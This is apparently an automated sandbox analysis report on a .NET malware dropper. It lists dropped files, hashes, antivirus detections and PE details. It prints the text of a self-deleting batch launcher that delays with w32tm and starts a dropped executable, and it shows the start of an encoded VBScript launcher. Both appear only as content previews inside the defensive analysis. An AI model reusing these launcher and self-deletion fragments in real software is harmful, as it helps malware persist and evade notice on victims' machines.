C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Agentserver.exe.log

Download File

Process:	C:\surrogateserverreviewsession\Agentserver.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	1740
Entropy (8bit):	5.36827240602657
Encrypted:	false
SSDEEP:	48:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhAHKKkhHNpaHKlT4x:iq+wmj0qCYqGSI6oPtzHeqKkhtpaqZ4x
MD5:	B28E0CCD25623D173B2EB29F3A99B9DD
SHA1:	070E4C4A7F903505259E41AFDF7873C31F90D591
SHA-256:	3A108902F93EF9E952D9E748207778718A2CBAEB0AB39C41BD37E9BB0B85BF3A
SHA-512:	17F5FBF18EE0058F928A4D7C53AA4B1191BA3110EDF8E853F145D720381FCEA650A3C997E3D56597150149771E14C529F1BDFDC4A2BBD3719336259C4DD8B342
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Memory Compression.exe.log

Download File

Process:	C:\Program Files\7-Zip\Lang\Memory Compression.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	1281
Entropy (8bit):	5.370111951859942
Encrypted:	false
SSDEEP:	24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhA2
MD5:	12C61586CD59AA6F2A21DF30501F71BD
SHA1:	E6B279DC134544867C868E3FF3C267A06CE340C7
SHA-256:	EC20A856DBBCF320F7F24C823D6E9D2FD10E9335F5DE2F56AB9A7DF1ED358543
SHA-512:	B0731F59C74C9D25A4C82E166B3DC300BBCF89F6969918EC748B867C641ED0D8E0DE81AAC68209EF140219861B4939F1B07D0885ACA112D494D23AAF9A9C03FE
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\dasHost.exe.log

Download File

Process:	C:\surrogateserverreviewsession\dasHost.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	1281
Entropy (8bit):	5.370111951859942
Encrypted:	false
SSDEEP:	24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhA2
MD5:	12C61586CD59AA6F2A21DF30501F71BD
SHA1:	E6B279DC134544867C868E3FF3C267A06CE340C7
SHA-256:	EC20A856DBBCF320F7F24C823D6E9D2FD10E9335F5DE2F56AB9A7DF1ED358543
SHA-512:	B0731F59C74C9D25A4C82E166B3DC300BBCF89F6969918EC748B867C641ED0D8E0DE81AAC68209EF140219861B4939F1B07D0885ACA112D494D23AAF9A9C03FE
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\uXGucUKOPdf.exe.log

Download File

Process:	C:\Program Files\Windows NT\uXGucUKOPdf.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	1281
Entropy (8bit):	5.370111951859942
Encrypted:	false
SSDEEP:	24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhA2
MD5:	12C61586CD59AA6F2A21DF30501F71BD
SHA1:	E6B279DC134544867C868E3FF3C267A06CE340C7
SHA-256:	EC20A856DBBCF320F7F24C823D6E9D2FD10E9335F5DE2F56AB9A7DF1ED358543
SHA-512:	B0731F59C74C9D25A4C82E166B3DC300BBCF89F6969918EC748B867C641ED0D8E0DE81AAC68209EF140219861B4939F1B07D0885ACA112D494D23AAF9A9C03FE
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

C:\Users\user\AppData\Local\Temp\HnPfnRVdev

Download File

Process:	C:\surrogateserverreviewsession\Agentserver.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.373660689688184
Encrypted:	false
SSDEEP:	3:RX+iiS0Ud:RX+BHE
MD5:	AAC121915D5651A06E9B400B6B970D83
SHA1:	702FC38C4FC7AD50DFA85157D7AA445EA674D24E
SHA-256:	A1297DAB8BF41299C3975505B7D550F4C292638791ECD8284249A7A122CCFAE9
SHA-512:	3F69148D4ACA2649AAF8C1541DDEC299CEB3B97786F07A689AFF6C80E0075C9C9871432BB46B057F8B82077E0768328B806E5ED6557117E802D610E374B5CCDA
Malicious:	false
Preview:	dIgL4rtnqlKJBGuIkl37QIoe8

C:\Users\user\AppData\Local\Temp\cAOdivXVvC.bat

Download File

Process:	C:\surrogateserverreviewsession\Agentserver.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	209
Entropy (8bit):	4.962338931514604
Encrypted:	false
SSDEEP:	3:mKDDBEIFK+KdTVpM3No+HK9ATScyW+jn9mlqxA35vXWtACSBktKcKZG1Ukh4E2J7:hITg3Nou11r+DEp5OKKOZG1923flxd
MD5:	93F531C7D01A87766EB4E523C6D1803C
SHA1:	DD00ADA962D5CEACB189D4E51D4BCABBF8D434BB
SHA-256:	0CD9A17BBE9ACAEA188CCD9F943F286652124DBE2B3652F473A9B5D814CABE72
SHA-512:	CA63054CBC21FAFC7FB144A59655E62FCBE92019BBD92B1861DC820556D764A5FBF342E451DBBFA595D6D2345861F18676B8AEEECC65B7F22FF6D0E5BE23AC86
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	@echo off..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 1>nul..start "" "C:\surrogateserverreviewsession\dasHost.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\cAOdivXVvC.bat"

C:\Windows\Containers\serviced\d5489f5e5451db

Download File

Process:	C:\surrogateserverreviewsession\Agentserver.exe
File Type:	ASCII text, with very long lines (982), with no line terminators
Category:	dropped
Size (bytes):	982
Entropy (8bit):	5.892892079487419
Encrypted:	false
SSDEEP:	24:KkNKskZjL2hdv/87DDZYugy/SUcisS6lka9vIJ2SwCZhG:RN427v/8HNYugy6UclS6pC2SwiG
MD5:	414F38F410F29978B8A54757BBC6FD71
SHA1:	643801C69DB2ECD38A81DCB6F289BAE36F563284
SHA-256:	AB33BB7EA8ADC21F264820D7F45E8DB8F53982694449496B5E96BF5E2CAA77E2
SHA-512:	23354608FB5FD9142C9F11B0E47D406A830ECD0287753E660F7022AE6F3CFEE116381967CBCC1B2E75D04ACF5052DBF82FA58EE1E2EB104509B2CFFE8E6F5C3C
Malicious:	false
Preview:	Z3VnkyYr6KZ5ULjitu4Ab7xMaZxOkHsElsk7KG4ky1vtHw1EJUJXYBhcGINKBJGycVUlklYn0ULkLEFnisEP8VpkLI1B2tipu6RwcPdi6fgDz6QBDjmTF1zGpuactWuHvg0OxTLSPfSdymuO1z8THPj3HKHszAzkuZSTGBOtYTDjiWRD9Ll3YbAf66HmMcdOqssZTaHzlO4xLAUv2DsoZ6LSYwWJ4lh50z3zn1tiDvSJhMU6lWuIuyzthZAhE859q87WGfHAUJknoBvMcahh1ZLBAJSN0LeF0SdjO7zGPtxkOLFfoyFnaYHRw6V7N4JJofwViM8elbSHlkwyDxjCG1ocKMwSm23Ujo5sYu6b0lC8F9pLJg3ZUGCx0UKWaq2si7i7oEaT0HMfyqWLgkIF9dAdlI2EjkBKsTaIbrhFGjjN4h8K79zzhwtE7EWgLWtQFCwfPOtyDD8Z3wiDJsGkuLm6jVKWVA3uzTH1vd5tPAwexULKgSWdPJf3Zz53DWdCJOkkoqSqwXUtZIIPK90DoaepxNc5hBp3htVitkgz9pq2yweRrqsEgZYst4xaOXJvsbLqxjfkdAD8tm0AtKO1TkXHUmzzxFlmg5KXkxeHKHkfVa9HDwrDJScHDEVKupxYZbcycda6qGqLA1v4mrwAYhcNdCTgbTWeULF48LpkWuXClQGLSbhD3wA28OUZJ3eXuM0yw15bBMonKalM5HNAvTkhLN5t0QacQ9SZZSZafFBrIXrimIdBqdlblSnj6LlvvLWKHLwnswepR3ZxfWHrwZwwY1yHo0eUeQ56BhaaVzT395Jr3zDkE48WZjwQXp91SKLA8cw85qW7G2xcrHNyw3PjRigbvKDq0bkzuJsaCFoYiBQhwTiPbKFZ4lsa6VNvmpGoS7riZxwrO0BQS9pblyOpWL4IaSer23v24lPylA0oYXKEkcH6pvJybaSGDjHHTEzVFJWqu0zk7kR8B0i8Kh

C:\Windows\Containers\serviced\uXGucUKOPdf.exe

Download File

Process:	C:\surrogateserverreviewsession\Agentserver.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	848896
Entropy (8bit):	6.081444529255217
Encrypted:	false
SSDEEP:	12288:1hxgIFhrjlpTamA1MV81MHwoST2ATWfEJ+0eh7i8+BSK6d7k0J:13rXTamAQ8uwoqTWy1Y7i887Kt
MD5:	F1AAAC4C20DF683E3596C8A7CD3DA07E
SHA1:	928E098DEA596D12E22ED56F85CF028BCF27B31F
SHA-256:	F3DD651E1EE7AB505F52E2C269A70E661D06E0EB51285AB41F89B3736352FA89
SHA-512:	613387CC5D808DD7A9199212476A2FF34A92F5919D1EA353B204AA931248B2FBF0EFE9261BFCA6DDB804621A8D6234DF4558CFFC326050A9424957DE3B05C6E2
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 83%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6......n.... ........@.. .......................`............@................................. ...K.... .......................@....................................................... ............... ..H............text...t.... ...................... ..`.sdata.../.......0..................@....rsrc........ ......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Offline Web Pages\d5489f5e5451db

Download File

Process:	C:\surrogateserverreviewsession\Agentserver.exe
File Type:	ASCII text, with very long lines (763), with no line terminators
Category:	dropped
Size (bytes):	763
Entropy (8bit):	5.9019170550653035
Encrypted:	false
SSDEEP:	12:FgP2slXVR92Zl4mssT9tVna6sernWqu5wnSSEAzme2KUkpc3SXFXYgkaYGuTOAQy:Fu2aXBWl4QTHcYrnWqu5wnrLZm7OMdQy
MD5:	A27AA33998C4CFFC90C8C13BEFC24130
SHA1:	6D1D5F405D65CBA2316839C6D1966E94F8432432
SHA-256:	DADDB923F9DAC903A19389BDC1BAC0C3567B8DCAA339D574A106A4FBFCDD69E0
SHA-512:	C350091B5A8F070100183BC9EB5F85E72F78441364BF01F1B62FB393C4659C2A573901ED280E0048E0A773C6DE1A045F2E343B8B0F5B4229812B93A7D67D922F
Malicious:	false
Preview:	d4dLXL2mGtgrVjP17wiCkrjygmCtfEK5kDO2C9yAtwlVRt706D3961LwVpouJJGCjlGRUWy87iTxFOgxpMxbKK8t2cgXVE1kpjvqmpfjP5BYiXqHI0E7Wp1YmXZ1zan3rsHgc0L9qOLPIkKfwZPe94OArXDOQntzSIqzQKoRpFQIdmPBN4FaLI4xeGyFw6tCeW7A3VOlu7z4nGhFHBBWiTnJN3VJVjfsVNnGpOH1pepOTAJYit7u5XeLtxxAAFPLcGiacbZ23JrEnZ0Mt6kmlux8tcW2bH1kOewNct6HTF0vpahT7lQDenjrSkr9EhbwRHzJnnuAAdSg3CSS5D501yFl4E41C6CwnEdikXqT0PCAUDyQRYEBml5dBOOjs27Ebg2yitrhWl9lvFQ0Qojo1AKCJAhWJHl8S8iyL9riqhoBmTs57XSDSTNaVzpiLUYP9BTwgcpQ7B7TVIazSlZvyip8vHcVUJWWJZBkA5ZfsCGQW3FNZzPk5mbbVUBY9T6xplK6GzyXM4CvbYl2CP6e3wag7kPp3AfYGTlvsIGjA2XBjp96tJWuWb32Ko8gjJdMYopIwzJ3IXeAZZ6SkS6tovBoZtlEJk91ZKn591J3Acl973dvrq5QMtimmBtDOEuiXmlOvAStJDtMKCrfP0WdosopmAS8HGo5sDlUSP9qYMHJ9VckTNxYsQ3o85lvsTlCYyeHaWNA0qEckepRiso4TQNbJ6WXnO8EkFvL1VK7AwhBLaEdPUM9ortIlC7

C:\Windows\Offline Web Pages\uXGucUKOPdf.exe

Download File

Process:	C:\surrogateserverreviewsession\Agentserver.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	848896
Entropy (8bit):	6.081444529255217
Encrypted:	false
SSDEEP:	12288:1hxgIFhrjlpTamA1MV81MHwoST2ATWfEJ+0eh7i8+BSK6d7k0J:13rXTamAQ8uwoqTWy1Y7i887Kt
MD5:	F1AAAC4C20DF683E3596C8A7CD3DA07E
SHA1:	928E098DEA596D12E22ED56F85CF028BCF27B31F
SHA-256:	F3DD651E1EE7AB505F52E2C269A70E661D06E0EB51285AB41F89B3736352FA89
SHA-512:	613387CC5D808DD7A9199212476A2FF34A92F5919D1EA353B204AA931248B2FBF0EFE9261BFCA6DDB804621A8D6234DF4558CFFC326050A9424957DE3B05C6E2
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 83%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6......n.... ........@.. .......................`............@................................. ...K.... .......................@....................................................... ............... ..H............text...t.... ...................... ..`.sdata.../.......0..................@....rsrc........ ......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\surrogateserverreviewsession\21b1a557fd31cc

Download File

Process:	C:\surrogateserverreviewsession\Agentserver.exe
File Type:	ASCII text, with very long lines (515), with no line terminators
Category:	dropped
Size (bytes):	515
Entropy (8bit):	5.865930962987725
Encrypted:	false
SSDEEP:	12:ZiP2BF+2SWOaQTIB6OJfoP9JaCynIwXaHUz:ZiMsWGTFOJf69HyJaS
MD5:	805253F365462853C30A098B433C87CF
SHA1:	4CB3938CCDC06587BBC91CD365E5C6F80BA5EB11
SHA-256:	680D19AA6908049F5DDAB968E3B590F13C80448FD68DD76AADBE82247FBE54DD
SHA-512:	33AB6CEDA97566308172CA73254B3085CD0E9AF558C7028881A32798A41217035CF1CF8E4DAD0229595F2E88B3AB37014EA412354FABF8829A87A16845BC62DA
Malicious:	false
Preview:	MgtMBRJeYkNdjDC6uu1rrElpmMzv91lUirh5RQ8EaaV4uSxJ0In4TryI4EjycXeh8341gGpevxQQsr5UZq41NqA13ZBNqKlC6y61Y5ntdIJfahaNJOZwcnTR2C8HFcxlMOU3vD6dCLYFhfaW8yDbuzjSfo9V6goBUiTMMgbFS6tRPNuWmmIRYW0WoCYGElgggXv8MOJbW8JyGSDS4msUYXm8s6hKIVArZMu2cvKYcq5aMCQW8FLc2MIJuxQPq9TA7cY3hLzJbU1rcMvpqLLCKiyNElHpe5rdX4dunXzxQBAhVariBkifyQ0YnLy5DKognYUhtBCTVYwIiR2n4jo4WLpGEEGci3tFXe37FJz9iPKZdr0WSKBeguJctOdo5jucprvEX5iuuoVHBPmWNuJX2OimUbN1qKD9esuw6w8XmQu1YBbdlGaLZXjaIIt6rqEjkWnTf0abvvumeqNT9uQju2jGITnxCCq6LLRCYI8vp8Zom76b4a66aezrxgKLMmYsFya

C:\surrogateserverreviewsession\Agentserver.exe

Download File

Process:	C:\Users\user\Desktop\CPYEzG7VGh.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	848896
Entropy (8bit):	6.081444529255217
Encrypted:	false
SSDEEP:	12288:1hxgIFhrjlpTamA1MV81MHwoST2ATWfEJ+0eh7i8+BSK6d7k0J:13rXTamAQ8uwoqTWy1Y7i887Kt
MD5:	F1AAAC4C20DF683E3596C8A7CD3DA07E
SHA1:	928E098DEA596D12E22ED56F85CF028BCF27B31F
SHA-256:	F3DD651E1EE7AB505F52E2C269A70E661D06E0EB51285AB41F89B3736352FA89
SHA-512:	613387CC5D808DD7A9199212476A2FF34A92F5919D1EA353B204AA931248B2FBF0EFE9261BFCA6DDB804621A8D6234DF4558CFFC326050A9424957DE3B05C6E2
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 83%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6......n.... ........@.. .......................`............@................................. ...K.... .......................@....................................................... ............... ..H............text...t.... ...................... ..`.sdata.../.......0..................@....rsrc........ ......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\surrogateserverreviewsession\cAWYZg0ZdjD2dKs6hjKja7TASB4qz.bat

Download File

Process:	C:\Users\user\Desktop\CPYEzG7VGh.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	49
Entropy (8bit):	3.7377732162396184
Encrypted:	false
SSDEEP:	3:I56xA35v4JAykAH:IB5AJAvi
MD5:	92E94BDECB9521BE3A47F97D2E66384E
SHA1:	EEE4FD6F12D9D0194D0BCC5703E11DFC23A3AD5B
SHA-256:	E248596953F8A96BAF8A2D3F4EB134B005AEDDEB7F2A7D5943C2788FACE1CA15
SHA-512:	B5A418AB94B9A8BE9D667411E838EE7B16BE373AA68D73F5C8BED8F47DC9BC4C38ABC8DEC7F06F4F778C9AA72ABDD0060293C573AD94832E24605EBF60991224
Malicious:	false
Preview:	"C:\surrogateserverreviewsession\Agentserver.exe"

C:\surrogateserverreviewsession\dasHost.exe

Download File

Process:	C:\surrogateserverreviewsession\Agentserver.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	848896
Entropy (8bit):	6.081444529255217
Encrypted:	false
SSDEEP:	12288:1hxgIFhrjlpTamA1MV81MHwoST2ATWfEJ+0eh7i8+BSK6d7k0J:13rXTamAQ8uwoqTWy1Y7i887Kt
MD5:	F1AAAC4C20DF683E3596C8A7CD3DA07E
SHA1:	928E098DEA596D12E22ED56F85CF028BCF27B31F
SHA-256:	F3DD651E1EE7AB505F52E2C269A70E661D06E0EB51285AB41F89B3736352FA89
SHA-512:	613387CC5D808DD7A9199212476A2FF34A92F5919D1EA353B204AA931248B2FBF0EFE9261BFCA6DDB804621A8D6234DF4558CFFC326050A9424957DE3B05C6E2
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 83%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6......n.... ........@.. .......................`............@................................. ...K.... .......................@....................................................... ............... ..H............text...t.... ...................... ..`.sdata.../.......0..................@....rsrc........ ......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\surrogateserverreviewsession\pmMvwz3lY7qlA.vbe

Download File

Process:	C:\Users\user\Desktop\CPYEzG7VGh.exe
File Type:	data
Category:	dropped
Size (bytes):	234
Entropy (8bit):	5.904493036437799
Encrypted:	false
SSDEEP:	6:GhkgwqK+NkLzWbHK/818nZNDd3RL1wQJRb96xmqMcI:GyBMCzWLKG4d3XBJjeLI
MD5:	94C156C40C9FA1A17EA1D1BE3E874AA1
SHA1:	95B81D6F87A35F34F81D01C31465C2FE0F743A7B
SHA-256:	33ABE968C7250E8FE61D27E7507F8271A989C0BF4FF42133159503F2A4719B5A
SHA-512:	A52E0FCBEFED81B7590CEED9B44762520580D946D72A5C3AC36FC6D07A964253A812E75D3CEBA42F83DDDD15FBE2114F65F7148975FCDD20C78547A59DE132AB
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	#@~^0QAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE@#@&.U^DbwO UV+n2vvT!Zb@#@&j.Y,./4?4nV^PxP;DnCD+r(%+1Y`r.jmMkaY ?4n^VE#@#@&.ktj4.VV ]!x~J;lJ/;MDKolD+knD7+.D.\rnS/+kdkKxz1).5\oZ}[L9+9\|dv4%\|Nl{Pz?A5.R8lDEBPTBP6lVk+SUQAAA==^#~@.

\Device\Null

Download File

Process:	C:\Windows\System32\w32tm.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	151
Entropy (8bit):	4.841191527523663
Encrypted:	false
SSDEEP:	3:VLV993J+miJWEoJ8FX4SzHfXTLvUyfXTJFyaNvoMWkvj:Vx993DEUUfXsyfXqFMV
MD5:	C9FDBF9EA825ABD2D239B634C3FED06C
SHA1:	B473A116BABADD064574EF2020B75F2D0740FCAE
SHA-256:	03A3845032D4500A8FE11B4D69BDADB479E421505A52B088614429C51A453A8C
SHA-512:	1B39438EA6A00930885779FD715859522B5EA4FA6EA694498724A9012901EC6FC0FA015E8124EB983D8C4DE0ECAB37D1DA2FCC53DBFD07AE2FBB3C0F0951FF5F
Malicious:	false
Preview:	Tracking localhost [[::1]:123]..Collecting 2 samples..The current time is 30/10/2024 15:08:26..15:08:26, error: 0x80072746.15:08:31, error: 0x80072746.

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.255552355556151
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 50.01% Win32 Executable (generic) a (10002005/4) 49.97% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	CPYEzG7VGh.exe
File size:	1'227'432 bytes
MD5:	f7361ed3503f11a56e8cc53ad6c277b8
SHA1:	bfa62d30d715bf866d5a2a6198a474c316b3dc04
SHA256:	a64e0fad64514c66bc6750432d8c3ef96932f9902886f540cca217031d1cfc44
SHA512:	9828478b57e85a2341262127e3149f5a9e48523198665b99634738627f107c1f5ab0c30ad80819bd9c4920836585397f4caef83c6d955cca6f0074b212fa96a4
SSDEEP:	24576:q2G/nvxW3WXlB6Fh3rXTamAQ8uwoqTWy1Y7i887KtU:qbA3q4h3rD5DiT1T2O
TLSH:	DE4538027E41CA11E4180633C2EF85544BB1AC516AE6E71B7EBD376DA5323937C0EADB
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......b`..&...&...&.....h.+.....j.......k.>.....^.$...._..0...._..5...._....../y..,.../y..#...&...*...._......._..'...._f.'...._..'..

File Icon


Icon Hash:	2f46d6d76e6a6c37

Static PE Info

General

Entrypoint:	0x41ec40
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Time Stamp:	0x5FC684D7 [Tue Dec 1 18:00:55 2020 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	fcf1390e9ce472c7270447fc5c61a0c1

Entrypoint Preview

Instruction
call 00007F094055D699h
jmp 00007F094055D0ADh
cmp ecx, dword ptr [0043E668h]
jne 00007F094055D225h
ret
jmp 00007F094055D81Eh
int3
int3
int3
int3
int3
push ebp
mov ebp, esp
push esi
push dword ptr [ebp+08h]
mov esi, ecx
call 00007F094054FFB7h
mov dword ptr [esi], 00435580h
mov eax, esi
pop esi
pop ebp
retn 0004h
and dword ptr [ecx+04h], 00000000h
mov eax, ecx
and dword ptr [ecx+08h], 00000000h
mov dword ptr [ecx+04h], 00435588h
mov dword ptr [ecx], 00435580h
ret
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
lea eax, dword ptr [ecx+04h]
mov dword ptr [ecx], 00435568h
push eax
call 00007F09405603BDh
pop ecx
ret
push ebp
mov ebp, esp
sub esp, 0Ch
lea ecx, dword ptr [ebp-0Ch]
call 00007F094054FF4Eh
push 0043B704h
lea eax, dword ptr [ebp-0Ch]
push eax
call 00007F094055FAD2h
int3
push ebp
mov ebp, esp
sub esp, 0Ch
lea ecx, dword ptr [ebp-0Ch]
call 00007F094055D1C4h
push 0043B91Ch
lea eax, dword ptr [ebp-0Ch]
push eax
call 00007F094055FAB5h
int3
jmp 00007F0940561B03h
jmp dword ptr [00433260h]
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
push 00421EB0h
push dword ptr fs:[00000000h]

Rich Headers

Programming Language:

[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[C++] VS2015 UPD3.1 build 24215
[EXP] VS2015 UPD3.1 build 24215
[RES] VS2015 UPD3 build 24213
[LNK] VS2015 UPD3.1 build 24215

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x3c820	0x34	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x3c854	0x3c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x63000	0x1cf40	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x80000	0x2268	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x3aac0	0x54	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
